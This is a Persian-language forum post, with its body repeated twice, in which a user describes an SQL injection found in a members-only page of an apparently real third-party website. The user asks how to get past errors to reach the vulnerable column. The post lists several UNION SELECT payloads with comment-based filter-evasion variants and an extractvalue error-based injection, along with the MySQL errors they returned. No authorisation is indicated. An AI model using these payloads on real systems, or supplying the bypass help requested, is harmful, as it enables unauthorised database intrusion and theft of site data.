سلام دوستان
من سایتی رو پیدا کردم که در یکی از لینک هاش دارای sqli بود. البته برای پیدا کردن این لینک باید عضو سایت بود که من با لاگین کردن در سایت به این مشکل پی بردم.
وقتی که از دستور order by استفاده کردم دیدم که تعداد ستون هاش 8 تاست ولی وقتی که از دستور union select استفاده می کنم با پیغام خطای زیر مواجه میشم که نمی تونم اونو دور بزنم حتی با برنامه ی هویج هم نتونستم کاری از پیش ببرم
ناگفته نمونه که من ترکیبی از دستورات زیر را هم استفاده کردم که جوابگو نبودند:[php]union+select+1,2,3,4,5,6,7,8--
/*!union*/+select+1,2,3,4,5,6,7,8--
/*!union*/+/*!select*/+1,2,3,4,5,6,7,8--
/*!50000union*/+select+1,2,3,4,5,6,7,8--
/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--[/php]
حتی از عبارت union select به شکل بزرگ هم مثل UNION SELECT در حالت های مختلف استفاده کردم ولی بازم جواب نداد و این پیام نمایش داده شد:[php]The used SELECT statements have a different number of columns[/php]
من حتی فیلم Xpath-Injection-lt را دیدم و دستور زیر رو هم روی تارگت استفاده کردم ولی باز هم به جواب نرسیدم و به این ارور برخورد کردم.
دستور مورد استفاده:[php]+and+extractvalue(rand(),concat(0x7e,version()))--[/php]
پیغام خطا:[php]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0x7eversion()))' at line 1[/php]
به نظر شما برای عبور از این پیغام های خطا و به دست آوردن ستون آسیب پذیر از چه روش هایی میشه استفاده کرد؟
ممنون میشم اگه کسی پاسخ بده.
با تقدیم احترام
صداقت
من سایتی رو پیدا کردم که در یکی از لینک هاش دارای sqli بود. البته برای پیدا کردن این لینک باید عضو سایت بود که من با لاگین کردن در سایت به این مشکل پی بردم.
وقتی که از دستور order by استفاده کردم دیدم که تعداد ستون هاش 8 تاست ولی وقتی که از دستور union select استفاده می کنم با پیغام خطای زیر مواجه میشم که نمی تونم اونو دور بزنم حتی با برنامه ی هویج هم نتونستم کاری از پیش ببرم
ناگفته نمونه که من ترکیبی از دستورات زیر را هم استفاده کردم که جوابگو نبودند:[php]union+select+1,2,3,4,5,6,7,8--
/*!union*/+select+1,2,3,4,5,6,7,8--
/*!union*/+/*!select*/+1,2,3,4,5,6,7,8--
/*!50000union*/+select+1,2,3,4,5,6,7,8--
/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--[/php]
حتی از عبارت union select به شکل بزرگ هم مثل UNION SELECT در حالت های مختلف استفاده کردم ولی بازم جواب نداد و این پیام نمایش داده شد:[php]The used SELECT statements have a different number of columns[/php]
من حتی فیلم Xpath-Injection-lt را دیدم و دستور زیر رو هم روی تارگت استفاده کردم ولی باز هم به جواب نرسیدم و به این ارور برخورد کردم.
دستور مورد استفاده:[php]+and+extractvalue(rand(),concat(0x7e,version()))--[/php]
پیغام خطا:[php]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0x7eversion()))' at line 1[/php]
به نظر شما برای عبور از این پیغام های خطا و به دست آوردن ستون آسیب پذیر از چه روش هایی میشه استفاده کرد؟
ممنون میشم اگه کسی پاسخ بده.
با تقدیم احترام
صداقت
نظر